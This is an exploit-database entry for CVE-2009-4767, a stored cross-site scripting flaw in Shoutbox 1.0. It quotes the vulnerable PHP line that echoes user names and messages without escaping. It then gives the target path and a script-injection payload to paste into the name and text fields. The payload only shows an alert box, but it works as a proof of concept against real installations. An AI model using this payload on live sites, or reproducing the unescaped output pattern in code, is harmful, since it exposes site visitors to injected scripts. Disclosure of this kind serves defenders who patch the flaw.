Shoutbox 1.0 - HTML / Cross-Site Scripting Injection
| EKU-ID: 17775 | CVE: OSVDB-60310;CVE-2009-4767 | OSVDB-ID: |
| Author: SkuLL-HackeR | Published: 2009-11-18 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17775 | CVE: OSVDB-60310;CVE-2009-4767 | OSVDB-ID: |
| Author: SkuLL-HackeR | Published: 2009-11-18 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r : SKuLL-HacKeR
# H0ME : Sec-Best & SaudiHack & S3curity-Art
# Email : My@Hotmail.iT
########################################
Vendor: http://www.plohni.com
exploit:
site.com/Shoutbox/index.php
in the select your name and your text put this code
'">><script>alert('XSS skh')</script>